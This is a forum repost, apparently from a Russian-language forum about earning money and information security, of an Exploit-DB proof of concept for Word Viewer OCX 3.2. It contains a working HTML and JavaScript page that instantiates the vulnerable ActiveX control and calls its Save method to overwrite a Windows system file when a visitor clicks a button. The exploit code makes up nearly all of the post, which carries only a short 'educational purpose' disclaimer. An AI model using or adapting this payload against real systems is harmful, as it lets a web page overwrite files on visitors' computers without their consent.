Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite | Gerki | Теневой Форум про Заработок и ИБ

Exploiter · 2022-12-21T14:29:31+00:00

======================================================================================= Author: Houssamix ======================================================================================= Word viewer OCX V 3.2...

Exploiter

Хакер

21 Дек 2022

EDB-ID: 7747

Проверка EDB

Пройдено

Автор: HOUSSAMIX

Тип уязвимости: REMOTE

Платформа: WINDOWS

CVE: N/A

Дата публикации: 2009-01-13

HTML:

=======================================================================================<br>
Author: Houssamix									   <br>
=======================================================================================<br>

 Word viewer OCX V 3.2 Remote File Overwrite exploit				<br>
 Download : http://www.officeocx.com/download/WordOCXSetup3.2.exe		 <br>

 Tested on Windows XP Professional SP2 , with Internet Explorer 6	<br>


=======================================================================================<br>
<HTML>
<BODY>
 <object id=hsmx classid="clsid:{97AF4A45-49BE-4485-9F55-91AB40F22BF2}"></object>

<SCRIPT>

function Do_it()
 {
     File = "c:\\windows\\system_.ini"
   hsmx.Save(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================<br>

This was written for educational purpose. Use it at your own risk.<br>
Author will be not responsible for any damage.<br>

# milw0rm.com [2009-01-13]

Источник: www.exploit-db.com

Поиск

Exploit Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite

Exploiter

Похожие темы